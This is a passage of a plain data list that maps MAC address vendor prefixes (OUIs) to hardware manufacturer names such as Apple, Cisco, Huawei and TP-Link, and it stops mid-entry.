Samsung Electronics +00A085 Private +ACDE48 Private +D09466 Dell +F0EFD2 TF Payment Service +30C01B Shenzhen Jingxun Software Telecommunication Technology +647C34 Ubee Interactive, Limited +747D24 Phicomm (Shanghai) +E817FC Fujitsu Cloud Technologies Limited +001009 Horanet +6432A8 Intel Corporate +78BC1A Cisco Systems +E4F004 Dell +60F677 Intel Corporate +288CB8 zte +0C72D9 zte +E472E2 Huawei Technologies +E86819 Huawei Technologies +602E20 Huawei Technologies +48BCA6 asung Techno +006069 Brocade Communications Systems +000CDB Brocade Communications Systems +8C7CFF Brocade Communications Systems +C4F57C Brocade Communications Systems +00237F Plantronics +00095B Netgear +000FB5 Netgear +803773 Netgear +405D82 Netgear +C0FFD4 Netgear +10DA43 Netgear +B03956 Netgear +C43DC7 Netgear +F87394 Netgear +401B5F Weifang GoerTek Technology +AC512C Infinix mobility limited +90B1E0 Beijing Nebula Link Technology +6C090A Gematica SRL +001439 Blonder Tongue Laboratories +107B44 Asustek Computer +9C4FCF TCT mobile +001BD3 Panasonic AVC Networks Company +00C08F Panasonic Electric Works +0008C9 TechniSat Digital GmbH Daun +20A6CD Hewlett Packard Enterprise +F4F3AA JBL GmbH & KG +38CD07 Beijing FaceCam Technology +B009DA Ring Solutions +444AB0 Zhejiang Moorgen Intelligence Technology +844167 Apple +B4F61C Apple +ECFA03 FCA +90324B Hon Hai Precision Ind. +78E103 Amazon Technologies +78A6E1 Brocade Communications Systems +F4D7B2 LGS Innovations +34298F Ieee Registration Authority +20040F Dell +2C7360 Earda Technologies +048B42 Skspruce Technologies +9C63ED zte +C421C8 Kyocera +002692 Mitsubishi Electric +F03D03 Tecno Mobile Limited +006088 Analog Devices +084ACF Guangdong Oppo Mobile Telecommunications +1CDDEA Guangdong Oppo Mobile Telecommunications +ECEBB8 Hewlett Packard Enterprise +5CE8B7 Oraimo Technology Limited +D89EF3 Dell +CC66B2 Nokia +C0742B Shenzhen Xunlong Software,limited +D8AFF1 Panasonic Appliances Company +7086C1 Texas Instruments +A072E4 NJ System +A8E824 Inim Electronics S.r.l. +6CB749 Huawei Technologies +A0FE61 Vivint Wireless +601803 Daikin Air-conditioning (Shanghai) +08152F Samsung Electronics, Artik +408BF6 Shenzhen TCL New Technology +F46E24 NEC Personal Computers +888279 Shenzhen Rb-link Intelligent Technologyltd +78321B D-Link International +EC51BC Guangdong Oppo Mobile Telecommunications +F079E8 Guangdong Oppo Mobile Telecommunications +A013CB Fiberhome Telecommunication Technologies +20896F Fiberhome Telecommunication Technologies +741E93 Fiberhome Telecommunication Technologies +18A3E8 Fiberhome Telecommunication Technologies +60B617 Fiberhome Telecommunication Technologies +CC500A Fiberhome Telecommunication Technologies +A8E705 Fiberhome Telecommunication Technologies +74C9A3 Fiberhome Telecommunication Technologies +D8A534 Spectronix +583879 Ricoh Company +94282E New H3C Technologies +D843ED Suzuken +887598 Samsung Electronics +D0B128 Samsung Electronics +FCEEE6 Formike Electronic +2C431A Shenzhen Youhua Technology +A8D3C8 Topcon Electronics GmbH & KG +389F5A C-Kur TV +24B209 Avaya +24E124 Xiamen Ursaconn Technology +DC68EB Nintendo +9441C1 Mini-Cam Limited +E8D819 AzureWave Technology +AC1DDF Ieee Registration Authority +0008FA KEB Automation KG +18396E Sunsea Telecommunications +E8DF70 AVM Audiovisuelles Marketing und Computersysteme GmbH +7CDD76 Suzhou Hanming Technologies +246880 Braveridge.co. +D00401 Motorola Mobility, a Lenovo Company +589043 Sagemcom Broadband SAS +28CF08 Essys +707DB9 Cisco Systems +346FED Enovation Controls +0000B4 Edimax Technology +08BEAC Edimax Technology +F06D78 Guangdong Oppo Mobile Telecommunications +7844FD TP-Link Technologies +503EAA TP-Link Technologies +AC84C6 TP-Link Technologies +E49ADC Apple +B8C111 Apple +3408BC Apple +34D0B8 Ieee Registration Authority +B0C19E zte +0C3747 zte +000097 Dell EMC +ECC06A PowerChord Group Limited +A89FEC Arris Group +38D7CA 7hugs Labs +6C05D5 Ethertronics +001DF4 Magellan Technology Limited +C02250 Private +0094A1 F5 Networks +1890D8 Sagemcom Broadband SAS +88835D Fn-link Technology Limited +10683F LG Electronics (Mobile Communications) +74A722 LG Electronics (Mobile Communications) +58A2B5 LG Electronics (Mobile Communications) +64899A LG Electronics (Mobile Communications) +88074B LG Electronics (Mobile Communications) +64BC0C LG Electronics (Mobile Communications) +A039F7 LG Electronics (Mobile Communications) +041B6D LG Electronics (Mobile Communications) +001F6B LG Electronics (Mobile Communications) +D007CA Juniper Networks +F86CE1 Taicang T&W Electronics +1C7328 Connected Home +40A93F Private +5C7776 TCT mobile +5846E1 Baxter International +00D0BD Lattice Semiconductor (LPA) +F08261 Sagemcom Broadband SAS +D084B0 Sagemcom Broadband SAS +00FEC8 Cisco Systems +EC2280 D-Link International +047863 Shanghai Mxchip Information Technology +24BA13 Riso Kagaku +24DA11 NO NDA +70CA4D Shenzhen lnovance Technology +DCC0EB Assa Abloy Cte Picarde +001735 Intel Wireless Network Group +9CDFB1 Shenzhen Crave Communication +5CF938 Apple +3871DE Apple +BC5436 Apple +0CC731 Currant +00142F Savvius +2CDDA3 Point Grey Research +24FD5B SmartThings +2876CD Funshion Online Technologies +F4F5D8 Google +F4F5E8 Google +F88FCA Google +BCD1D3 Shenzhen Tinno Mobile Technology +BC4434 Shenzhen Tinno Mobile Technology +0041D2 Cisco Systems +4CFB45 Huawei Technologies +A4BA76 Huawei Technologies +78E3B5 Hewlett Packard +984BE1 Hewlett Packard +68B599 Hewlett Packard +14D64D D-Link International +C8BE19 D-Link International +BCF685 D-Link International +CCB255 D-Link International +84C9B2 D-Link International +DCD321 Humax +CC4EEC Humax +DC330D Qingdao Haier TelecomLtd +0080E1 STMicroelectronics SRL +58DC6D Exceptional Innovation +00092D HTC +F8DB7F HTC +E899C4 HTC +7CB15D Huawei Technologies +18686A zte +0C0535 Juniper Systems +8CF228 Shenzhen Mercury Communication Technologies +8851FB Hewlett Packard +AC162D Hewlett Packard +A0B3CC Hewlett Packard +E4115B Hewlett Packard +C8CBB8 Hewlett Packard +9457A5 Hewlett Packard +0001E7 Hewlett Packard +080009 Hewlett Packard +0080A0 Hewlett Packard +D48564 Hewlett Packard +3C4A92 Hewlett Packard +780AC7 Baofeng TV +001D73 Buffalo.inc +001601 Buffalo.inc +106F3F Buffalo.inc +8857EE Buffalo.inc +009C02 Hewlett Packard +78E7D1 Hewlett Packard +001B78 Hewlett Packard +001E0B Hewlett Packard +2C6E85 Intel Corporate +00D0B7 Intel +0002B3 Intel +001111 Intel +001320 Intel Corporate +0012F0 Intel Corporate +9049FA Intel Corporate +C8348E Intel Corporate +00508B Hewlett Packard +784859 Hewlett Packard +1458D0 Hewlett Packard +5065F3 Hewlett Packard +A0481C Hewlett Packard +A01D48 Hewlett Packard +94B2CC Pioneer +887F03 Comper Technology Investment Limited +E06066 Sercomm +0019E0 TP-Link Technologies +0023CD TP-Link Technologies +002719 TP-Link Technologies +40169F TP-Link Technologies +940C6D TP-Link Technologies +74EA3A TP-Link Technologies +90F652 TP-Link Technologies +10FEED TP-Link Technologies +C46E1F TP-Link Technologies +50FA84 TP-Link Technologies +F483CD TP-Link Technologies +882593 TP-Link Technologies +808917 TP-Link Technologies +5C899A TP-Link Technologies +1C994C Murata Manufacturing +F02765 Murata Manufacturing +20A783 miControl GmbH +005053 Cisco Systems +00500F Cisco Systems +D842AC Shanghai Feixun Communication +34CDBE Huawei Technologies +D46AA8 Huawei Technologies +5439DF Huawei Technologies +4846FB Huawei Technologies +200BC7 Huawei Technologies +104780 Huawei Technologies +88308A Murata Manufacturing +44A7CF Murata Manufacturing +0013E0 Murata Manufacturing +344B50 zte +FCC897 zte +9CD24B zte +C864C7 zte +D0154A zte +88E3AB Huawei Technologies +00664B Huawei Technologies +68A0F6 Huawei Technologies +5CF96A Huawei Technologies +B43052 Huawei Technologies +88CEFA Huawei Technologies +582AF7 Huawei Technologies +F48E92 Huawei Technologies +40CBA8 Huawei Technologies +087A4C Huawei Technologies +D46E5C Huawei Technologies +2469A5 Huawei Technologies +C8D15E Huawei Technologies +F83DFF Huawei Technologies +308730 Huawei Technologies +002568 Huawei Technologies +30D17E Huawei Technologies +9C28EF Huawei Technologies +7C6097 Huawei Technologies +60DE44 Huawei Technologies +3400A3 Huawei Technologies +643E8C Huawei Technologies +00C610 Apple +70DEE2 Apple +182032 Apple +6CC26B Apple +1040F3 Apple +FC253F Apple +183451 Apple +C0847A Apple +64200C Apple +74E1B6 Apple +0C771A Apple +00F4B9 Apple +C8334B Apple +B8F6B1 Apple +C09F42 Apple +189EFC Apple +6C3E6D Apple +0016FE Alps Electric +0498F3 Alps Electric +38C096 Alps Electric +E0750A Alps Electric +B05947 Shenzhen Qihu Intelligent Technology Company Limited +00E04F Cisco Systems +001011 Cisco Systems +0010F6 Cisco Systems +80E01D Cisco Systems +80E86F Cisco Systems +E4AA5D Cisco Systems +B0AA77 Cisco Systems +78BAF9 Cisco Systems +0016B6 Cisco-Linksys +0018F8 Cisco-Linksys +00252E Cisco Spvtg +A4A24A Cisco Spvtg +602AD0 Cisco Spvtg +001BFB Alps Electric +00E08F Cisco Systems +203A07 Cisco Systems +34A84E Cisco Systems +E4D3F1 Cisco Systems +1CE6C7 Cisco Systems +E02F6D Cisco Systems +8478AC Cisco Systems +4403A7 Cisco Systems +6886A7 Cisco Systems +B4E9B0 Cisco Systems +000832 Cisco Systems +B0FAEB Cisco Systems +500604 Cisco Systems +70105C Cisco Systems +7CFADF Apple +101C0C Apple +001124 Apple +001D4F Apple +001E52 Apple +001F5B Apple +001FF3 Apple +0021E9 Apple +00236C Apple +002500 Apple +60FB42 Apple +14DAE9 Asustek Computer +3C08F6 Cisco Systems +D072DC Cisco Systems +28C7CE Cisco Systems +6CFA89 Cisco Systems +58F39C Cisco Systems +346288 Cisco Systems +881DFC Cisco Systems +F81EDF Apple +90840D Apple +D8A25E Apple +C8BCC8 Apple +28E7CF Apple +D89E3F Apple +040CCE Apple +A4D1D2 Apple +406C8F Apple +C067AF Cisco Systems +64E950 Cisco Systems +189C5D Cisco Systems +000EA6 Asustek Computer +0013D4 Asustek Computer +002618 Asustek Computer +00248C Asustek Computer +0050A2 Cisco Systems +0050F0 Cisco Systems +00905F Cisco Systems +00902B Cisco Systems +00100B Cisco Systems +00100D Cisco Systems +001014 Cisco Systems +649ABE Apple +94E96A Apple +AC293A Apple +10417F Apple +7014A6 Apple +A8667F Apple +D02598 Apple +CC29F5 Apple +6C709F Apple +0C3E9F Apple +34E2FD Apple +609217 Apple +8863DF Apple +80E650 Apple +006171 Apple +90FD61 Apple +5C97F3 Apple +6C4008 Apple +24A074 Apple +F02475 Apple +20A2E4 Apple +5CF5DA Apple +D4B8FF Home Control Singapore Pte +28E14C Apple +54E43A Apple +C8E0EB Apple +A88808 Apple +907240 Apple +0C4DE9 Apple +D89695 Apple +0C3021 Apple +F0F61C Apple +B03495 Apple +848E0C Apple +8C2DAA Apple +444C0C Apple +84FCFE Apple +E48B7F Apple +5C969D Apple +A8FAD8 Apple +949426 Apple +E0F5C6 Apple +AC6462 zte +C08488 Finis +68E8EB Linktel Technologies +20C3A4 RetailNext +780541 Queclink Wireless Solutions +C02DEE Cuff +54A3FA BQT Solutions (Australia)Pty +9023EC Availink +3891D5 Hangzhou H3C Technologies, Limited +90DFFB Homerider Systems +3C831E CKD +381C23 Hilan Technology +E03676 Huawei Technologies +3CB72B Plumgrid +243184 Sharp +24DA9B Motorola Mobility, a Lenovo Company +3052CB Liteon Technology +B8B2EB Googol Technology (HK) Limited +C40049 Kamama +50A9DE Smartcom - Bulgaria AD +E8DED6 Intrising Networks +B844D9 Apple +DC2B2A Apple +8C10D4 Sagemcom Broadband SAS +089B4B iKuai Networks +3C7873 Airsonics +BC5FF6 Shenzhen Mercury Communication Technologies +C8F9C8 NewSharp Technology(SuZhou)Co +3C5CC3 Shenzhen First Blue Chip Technology +A8741D Phoenix Contact Electronics Gmbh +A4C138 Telink Semiconductor (Taipei) +D8EFCD Nokia +EC0133 Trinus Systems +1C56FE Motorola Mobility, a Lenovo Company +7CA23E Huawei Technologies +501AA5 GN Netcom A/S +F09A51 Shanghai Viroyal Electronic Technology Company Limited +9870E8 Innatech SDN BHD +50DF95 Lytx +584925 E3 Enterprise +94F278 Elma Electronic +E8BDD1 Huawei Technologies +3481F4 SST Taiwan +F4B8A7 zte +58F102 BLU Products +B869C2 Sunitec Enterprise +2CC548 IAdea +307CB2 Anov France +90D8F3 zte +444CA8 Arista Networks +FCE33C Huawei Technologies +BC6A2F Henge Docks +E4907E Motorola Mobility, a Lenovo Company +48066A Tempered Networks +1CF03E Wearhaus +DCDB70 Tonfunk Systementwicklung und Service GmbH +C47D46 Fujitsu Limited +68EDA4 Shenzhen Seavo Technology +B899B0 Cohere Technologies +80C5E6 Microsoft +D85DEF Busch-Jaeger Elektro GmbH +10DF8B Shenzhen CareDear Communication Technology +00A784 ITX security +800184 HTC +38FACA Skyworth Digital Technology(Shenzhen) +44C69B Wuhan Feng Tian Information Network +C02567 Nexxt Solutions +B46D35 Dalian Seasky Automation;Ltd +B89ACD Elite Optoelectronic(asia)co. +241C04 Shenzhen Jehe Technology Development +F8CFC5 Motorola Mobility, a Lenovo Company +BCF811 Xiamen Dnake Technology +A8827F Cibn Oriental Network(beijing) +900A39 Wiio +C4693E Turbulence Design +1C8341 Hefei Bitland Information TechnologyLtd +4011DC Sonance +249EAB Huawei Technologies +DC56E6 Shenzhen Bococom Technology +5CA178 TableTop Media (dba Ziosk) +702A7D EpSpot AB +B8B3DC Derek (shaoguan) Limited +6C1E70 Guangzhou Ybds IT +C8E130 Milkyway Group +8833BE Ivenix +34CC28 Nexpring +144146 Honeywell (China) +F41563 F5 Networks +C4EA1D Technicolor +20E407 Spark srl +887384 Toshiba +584704 Shenzhen Webridge Technology +B856BD ITT +107873 Shenzhen Jinkeyi Communication +D45556 Fiber Mountain +F01E34 Orico Technologies +74A063 Huawei Technologies +A89008 Beijing Yuecheng Technology +183864 Cap-tech International +08D34B Techman Electronics (Changshu) +C808E9 LG Electronics +78ACBF Igneous Systems +206274 Microsoft +5CCCFF Techroutes Network Pvt +844BB7 Beijing Sankuai Online Technology +148F21 Garmin International +3C6A9D Dexatek Technology +14893E Vixtel Technologies Limted +60F189 Murata Manufacturing +74A34A Zimi +D89341 General Electric Global Research +F4645D Toshiba +30D587 Samsung Electronics +1436C6 Lenovo Mobile Communication Technology +04C09C Tellabs +844464 ServerU +589B0B Shineway Technologies +A48CDB Lenovo +4062B6 Tele system communication +3C2C94 HangZhou Delan Technology +78312B zte +C035C5 Prosoft Systems +F8B2F3 Guangzhou Bosma Technology +1C7D22 Fuji Xerox +7C11CD QianTang Technology +0492EE iway AG +F02A23 Creative Next Design +8C9109 Toyoshima Electric Technoeogy(Suzhou) +307350 Inpeco SA +E8CC18 D-Link International +B09137 ISis ImageStream Internet Solutions +3C1E13 Hangzhou Sunrise Technology +B4A828 Shenzhen Concox Information Technology +A41242 NEC Platforms +404EEB Higher Way Electronic +50BD5F TP-Link Technologies +147590 TP-Link Technologies +ECB907 CloudGenix +5CF9F0 Atomos Engineering P/L +FCDBB3 Murata Manufacturing +B8186F Oriental Motor +1C9C26 Zoovel Technologies +9C3583 Nipro Diagnostics +C456FE Lava International +B89BE4 ABB Power Systems Power Generation +C0EEFB OnePlus Tech (Shenzhen) +108A1B Raonix +8CF813 Orange Polska +B8F317 iSun Smasher Communications Private Limited +2442BC Alinco,incorporated +C401CE Presition (2000) +D01242 Bios +50F43C Leeo +B43934 Pen Generations +DCC622 Buheung System +D062A0 China Essence Technology (Zhumadian) +CC10A3 Beijing Nan Bao Technology +2CA30E Power Dragon Development Limited +4CF5A0 Scalable Network Technologies +084656 Veo-labs +4488CB Camco Technologies NV +5014B5 Richfit Information Technology +CC3080 Vaio +F82441 Yeelink +6CBFB5 Noon Technology +489D18 Flashbay Limited +8CB094 Airtech I&C +70F196 Actiontec Electronics +6C6EFE Core Logic +E4C62B Airware +80F8EB RayTight +94B40F Aruba Networks +4C2C83 Zhejiang KaNong Network Technology +E89606 testo Instruments (Shenzhen) +CC3F1D Intesis Software SL +902181 Shanghai Huaqin Telecom Technology +600417 Posbank +A44AD3 ST Electronics(Shanghai) +2497ED Techvision Intelligent Technology Limited +104E07 Shanghai Genvision Industries +FCD5D9 Shenzhen Sdmc Technology +007532 Inid BV +907EBA Utek Technology (shenzhen) +488244 Life Fitness / Div. of Brunswick +A8F7E0 Planet Technology +2C5BE1 Centripetal Networks +D87EB1 x.o.ware +4045DA Spreadtrum Communications (Shanghai) +98BE94 IBM +D4B43E Messcomp Datentechnik GmbH +A8E539 Moimstone +98F170 Murata Manufacturing +04C991 Phistek +581F67 Open-m technology limited +BC25F0 3D Display Technologies +7CE524 Quirky +D85DFB Private +7CC4EF Devialet +94AEE3 Belden Hirschmann Industries (Suzhou) +44666E Ip-line +705B2E M2Communication +0C8C8F Kamo Technology Limited +F4FD2B Zoyi Company +FCAA14 Giga-byte Technology +50FEF2 Sify Technologies +3CD9CE Eclipse WiFi +C80210 LG Innotek +702DD1 Newings Communication +44746C Sony Mobile Communications AB +F4F646 Dediprog Technology +ECD9D1 Shenzhen TG-NET Botone Technology +748F4D MEN Mikro Elektronik GmbH +A47E39 zte +0C63FC Nanjing Signway Technology +ACA9A0 Audioengine +A8A668 zte +60E327 TP-Link Technologies +E4D332 TP-Link Technologies +A0DA92 Nanjing Glarun Atten Technology +6828BA Dejai +48D18E Metis Communication +A49F85 Lyve Minds +7CD30A Inventec +3481C4 AVM GmbH +085700 TP-Link Technologies +888914 All Components Incorporated +D8150D TP-Link Technologies +A06518 Vnpt Technology +748F1B MasterImage 3D +F03A4B Bloombase +D82A15 Leitner SpA +C4291D Klemsan Elektrik Elektronik San.ve Tic.as. +704E01 Kwangwon Tech +848433 Paradox Engineering SA +D4319D Sinwatec +DC052F National Products +CC398C Shiningtek +6C5F1C Lenovo Mobile Communication Technology +B42C92 Zhejiang Weirong Electronic +FC1349 Global Apps +8C41F2 RDA Technologies +FC07A0 LRE Medical GmbH +AC02CA HI Solutions +F490CA Tensorcom +2C534A Shenzhen Winyao Electronic Limited +CC856C Shenzhen MDK Digital Technology +60FFDD C.E. Electronics +FCBBA1 Shenzhen Minicreate Technology +50B695 Micropoint Biotechnologies +B48547 Amptown System Company GmbH +3C25D7 Nokia +1889DF CerebrEX +30A8DB Sony Mobile Communications AB +CC9F35 Transbit Sp. z o.o. +407875 Imbel - Industria de Material Belico do Brasil +0C4F5A ASA-RT s.r.l. +B4B542 Hubbell Power Systems +54CDEE ShenZhen Apexis Electronic +F8F005 Newport Media +98C0EB Global Regency +D4224E Alcatel Lucent +28DEF6 bioMerieux +88E8F8 Yong TAI Electronic (dongguan) +2C073C Devline Limited +7CE4AA Private +1820A6 Sage +BCF61C Geomodeling Wuxi Technology +083F3E WSH GmbH +6C09D6 Digiquest Electronics +8C569D Imaging Solutions Group +A43A69 Vers +387B47 Akela +7CCD11 MS-Magnet +4CE1BB Zhuhai HiFocus Technology +8CDE99 Comlab +B46698 Zealabs srl +283B96 Cool Control +80D433 LzLabs GmbH +085AE0 Recovision Technology +BCEE7B Asustek Computer +FC09D8 Acteon Group +0C1262 zte +687CC8 Measurement Systems S. de R.L. +F015A0 KyungDong One +ECF72B HD Digital Tech +D8B6D6 Blu Tether Limited +847207 I&C Technology +E0AEB2 Bender GmbH &KG +2C553C Gainspeed +B43E3B Viableware +F854AF ECI Telecom +2464EF CYG Sunri +50B888 wi2be Tecnologia S/A +B8C1A2 Dragon Path Technologies, Limited +50ED78 Changzhou Yongse Infotech +8CB7F7 Shenzhen UniStrong Science & Technology +085240 EbV Elektronikbau- und Vertriebs GmbH +80F25E Kyynel +844F03 Ablelink Electronics +94B9B4 Aptos Technology +D0B523 Bestcare Cloucal +783D5B Telnet Redes Inteligentes +D0C42F Tamagawa Seiki +5CFFFF Shenzhen Kezhonglong Optoelectronic Technology +F0D3A7 CobaltRay +847616 Addat s.r.o. +D46867 Neoventus Design Group +68692E Zycoo +38BF2F Espec +182012 Aztech Associates +C0F991 GME Standard Communications P/L +14EDA5 Wachter GmbH Sicherheitssysteme +E056F4 AxesNetwork Solutions +385AA8 Beijing Zhongdun Security Technology Development +FC3FAB Henan Lanxin Technology +F8FF5F Shenzhen Communication Technology +DCC422 Systembase Limited +F4BD7C Chengdu jinshi communication +C8F36B Yamato Scale +6C90B1 SanLogic +845C93 Chabrier Services +D44C9C Shenzhen Yoobao Technologyltd +A88D7B SunDroid Global limited. +A03B1B Inspire Tech +3C6E63 Mitron OY +502E5C HTC +20D21F Wincal Technology +FC1E16 Ipevo +6C4B7F Vossloh-Schwabe Deutschland GmbH +0CCB8D Asco Numatics Gmbh +2847AA Nokia +682DDC Wuhan Changjiang Electro-Communication Equipment +1C63B7 OpenProducts 237 AB +A0A23C Gpms +708D09 Nokia +FCE1D9 Stable Imaging Solutions +38B74D Fijowave Limited +A0E5E9 enimai +9CBB98 Shen Zhen RND Electronic +345C40 Cargt Holdings +34885D Logitech Far East +6064A1 RADiflow +8079AE ShanDong Tecsunrise +2C7155 HiveMotion +909916 Elvees Neotek Ojsc +FC1BFF V-zug AG +AC5036 Pi-Coral +FC019E Vievu +F45F69 Matsufu Electronics distribution Company +F4A294 Eagle World Development, Limited +2CCD69 Aqavi.com +947C3E Polewall Norge AS +E0D1E6 Aliph dba Jawbone +28C671 Yota Devices OY +DC1792 Captivate Network +7C8306 Glen Dimplex Nordic as +907A0A Gebr. Bode GmbH & KG +306112 PAV GmbH +A0C6EC Shenzhen Anyk Technology +C80258 ITW GSE ApS +1001CA Ashley Butterworth +246AAB IT-IS International +28F532 ADD-Engineering BV +FC4BBC Sunplus Technology +142D8B Incipio Technologies +CCE8AC Soyea Technology +78D38D Hongkong Yunlink Technology Limited +1C48F9 GN Netcom A/S +744BE9 Explorer Hypertech +B836D8 Videoswitch +F835DD Gemtek Technology +0CF019 Malgn Technology +D46A91 Snap AV +E8519D Yeonhab Precision +00B78D Nanjing Shining Electric Automation +68E166 Private +60FEF9 Thomas & Betts +78FE41 Socus networks +083571 CASwell +DCF755 Sitronik +ACCA8E ODA Technologies +6405BE NEW Light LED +E03E4A Cavanagh Group International +6CB350 Anhui comhigher tech +A42305 Open Networking Laboratory +1C86AD MCT +882364 Watchnet DVR +A05B21 Envinet Gmbh +50B8A2 ImTech Technologies +B04C05 Fresenius Medical Care Deutschland GmbH +A0EC80 zte +9046B7 Vadaro Pte +1C08C1 Lg Innotek +201D03 Elatec GmbH +C06C6D MagneMotion +74CA25 Calxeda +CCBD35 Steinel GmbH +788DF7 Hitron Technologies. +6CECA1 Shenzhen Clou Electronics +D862DB Eno +68DB67 Nantong Coship Electronics +BC261D Hong Kong Tecon Technology +888964 GSI Electronics +9CA577 Osorno Enterprises +C0C3B6 Automatic Systems +A8294C Precision Optical Transceivers +D0EB03 Zhehua technology limited +A0861D Chengdu Fuhuaxin Technology +9498A2 Shanghai Listen Tech.ltd +2CB693 Radware +88685C Shenzhen ChuangDao & Perpetual Eternal Technology +B4FE8C Centro Sicurezza Italia SpA +D82916 Ascent Communication Technology +6472D8 GooWi Technology,Limited +84ACA4 Beijing Novel Super Digital TV Technology +3C6FF7 EnTek Systems +B838CA Kyokko Tsushin System +380FE4 Dedicated Network Partners Oy +847A88 HTC +5461EA Zaplox AB +78324F Millennium Group +F05DC8 Duracell Powermat +48F925 Maestronic +C0885B SnD Tech +64C667 Barnes&Noble +C47DCC Zebra Technologies +64535D Frauscher Sensortechnik +105F06 Actiontec Electronics +841715 GP Electronics (HK) +087999 AIM GmbH +84C2E4 Jiangsu Qinheng +C0B8B1 BitBox +0C722C TP-Link Technologies +B01408 Lightspeed International +F8FEA8 Technico Japan +A8154D TP-Link Technologies +D05099 ASRock Incorporation +78A106 TP-Link Technologies +A49EDB AutoCrib +282CB2 TP-Link Technologies +D43A65 Igrs Engineering Lab +10B9FE Lika srl +D42751 Infopia +A895B0 Aker Subsea +5C20D0 Asoni Communication +E0C3F3 zte +104D77 Innovative Computer Engineering +3C081E Beijing Yupont Electric Power Technology +7CA15D GN ReSound A/S +B4DD15 ControlThings Oy Ab +3C86A8 Sangshin elecom .co +FCDD55 Shenzhen WeWins wireless +CC0DEC Cisco Spvtg +68B094 Inesa Electron +40E730 DEY Storage Systems +A8D236 Lightware Visual Engineering +6C8686 Technonia +84E714 Liang Herng Enterprise,Co.Ltd. +303D08 Glintt TES +9C541C Shenzhen My-power Technology +E496AE Altographics +F80BD0 Datang Telecom communication terminal (Tianjin) +48B9C2 Teletics +D046DC Southwest Research Institute +046E49 TaiYear Electronic Technology (Suzhou) +08606E Asustek Computer +BC39A6 Csun System Technology +ECB541 Shinano E and Eltd. +D40057 MC Technologies GmbH +48B8DE Homewins Technology +1065CF Iqsim +849DC5 Centera Photonics +580943 Private +547FA8 Telco Systems, S.r.o. +5474E6 Webtech Wireless +AC5D10 Pace Americas +88F490 Jetmobile Pte +E8A364 Signal Path International / Peachtree Audio +D0D6CC Wintop +101D51 ON-Q dba ON-Q Mesh Networks +34C99D Eidolon Communications Technology +8C4AEE Giga TMS +F46DE2 zte +04F8C2 Flaircomm Microelectronics +0C93FB BNS Solutions +38B5BD E.G.O. Elektro-Ger +B85AF7 Ouya +E0D9A2 Hippih aps +F0F669 Motion Analysis +F8D7BF REV Ritter GmbH +00B56D David Electronics +B461FF Lumigon A/S +9038DF Changzhou Tiannengbo System +CC593E Toumaz +AC8D14 Smartrove +18673F Hanover Displays Limited +A00ABF Wieson Technologies +2091D9 I'M SPA +744D79 Arrive Systems +C83D97 Nokia +38192F Nokia +141BF0 Intellimedia Systems +E45614 Suttle Apparatus +842BBC Modelleisenbahn GmbH +E856D6 NCTech +4088E0 Beijing Ereneben Information Technology Limited Shenzhen Branch +1CF4CA Private +F490EA Deciso +942197 Stalmart Technology Limited +AC9403 Envision Peripherals +A865B2 Dongguan Yishang Electronic Technology, Limited +60B982 RO.VE.R. Laboratories +B46238 Exablox +40704A Power Idea Technology Limited +A40BED Carry Technology +0CD996 Cisco Systems +D82DE1 Tricascade +C438D3 Tagatec +547398 Toyo Electronics +E0AAB0 General Vision Electronics +68B43A WaterFurnace International +543968 Edgewater Networks +985E1B ConversDigital +B8B7D7 2GIG Technologies +1048B1 Beijing Duokan Technology Limited +005D03 Xilinx +24EE3A Chengdu Yingji Electronic Hi-tech +F82285 Cypress Technology +8482F4 Beijing Huasun Unicreate Technology +0CC47E Eucast +CCE798 My Social Stuff +50724D BEG Brueck Electronic GmbH +B898B0 Atlona +2C625A Finest Security Systems +2074CF Shenzhen Voxtech +ACBD0B Imac +D8D27C Jema Energy +10F3DB Gridco Systems +B01203 Dynamics Hong Kong Limited +7093F8 Space Monkey +305D38 Beissbarth +044A50 Ramaxel Technology (Shenzhen) limited company +A4466B EOC Technology +3CF392 Virtualtek. +889676 TTC Marconi S.r.o. +149FE8 Lenovo Mobile Communication Technology +70B599 Embedded Technologies s.r.o. +EC4C4D ZAO NPK RoTeK +E8D483 Ultimate Europe Transportation Equipment Gmbh +ACD9D6 tci GmbH +7493A4 Zebra Technologies +9C0DAC Tymphany HK Limited +8CD3A2 VisSim AS +647657 Innovative Security Designs +60455E Liptel s.r.o. +944A09 BitWise Controls +E8102E Really Simple Software +D48CB5 Cisco Systems +D41E35 Toho Electronics +700BC0 Dewav Technology Company +2CD444 Fujitsu Limited +EC1A59 Belkin International +60CBFB AirScape +4C5427 Linepro Sp. z o.o. +3CEAFB NSE AG +3476C5 I-O Data Device +407074 Life Technology (China) +58BFEA Cisco Systems +7C386C Real Time Logic +D8AF3B Hangzhou Bigbright Integrated communications system +78D34F Pace-O-Matic +784405 Fujitu(hong Kong) Electronic +C03F2A Biscotti +44B382 Kuang-chi Institute of Advanced Technology +D80DE3 FXI Technologies AS +1CE165 Marshal +0CC0C0 Magneti Marelli Sistemas Electronicos Mexico +AC40EA C&T Solution +BC8B55 NPP Eliks America DBA T&M Atlantic +202598 Teleview +844915 vArmour Networks +A04CC1 Helixtech +1CB243 TDC A/S +1C51B5 Techaya +80DB31 Power Quotient International +AC0142 Uriel Technologies SIA +A007B6 Advanced Technical Support +542A9C LSY Defense +F89955 Fortress Technology +B827EB Raspberry Pi +E88DF5 Znyx Networks +48EA63 Zhejiang Uniview Technologies +0CE5D3 DH electronics GmbH +C47130 Fon Technology S.L. +48D7FF Blankom Antennentechnik Gmbh +F47F35 Cisco Systems +A0F419 Nokia +BCC168 DinBox Sverige AB +6CAE8B IBM +A4F7D0 LAN Accessories +D4EC0C Harley-Davidson Motor Company +6CA96F TransPacket AS +48ED80 daesung eltec +A086EC Saehan Hitec +BC4B79 SensingTek +2818FD Aditya Infotech +E42C56 Lilee Systems +50008C Hong Kong Telecommunications (HKT) Limited +DCA8CF New Spin Golf +34BA9A Asiatelco Technologies +642DB7 Seungil Electronics +008DDA Link One +08B4CF Abicom International +445F7A Shihlin Electric & Engineering +28BA18 NextNav +2C36F8 Cisco Systems +AC3D05 Instorescreen Aisa +F48E09 Nokia +D443A8 Changzhou Haojie Electric +BCB852 Cybera +70D6B6 Metrum Technologies +28D576 Premier Wireless +6CE907 Nokia +94DF58 IJ Electron +8C0CA3 Amper +28940F Cisco Systems +5CEB4E R. Stahl HMI Systems Gmbh +B8DAF7 Advanced Photonics +2C36A0 Capisco Limited +800A06 Comtec +20FABB Cambridge Executive Limited +1C0B52 Epicom S.A +747E2D Beijing Thomson Citic Digital Technology +E80C75 Syncbak +18D66A Inmarsat +C85645 Intermas France +8C604F Cisco Systems +74FF7D Wren Sound Systems +30B216 Hytec Geraetebau GmbH +34FC6F Alcea +C0B357 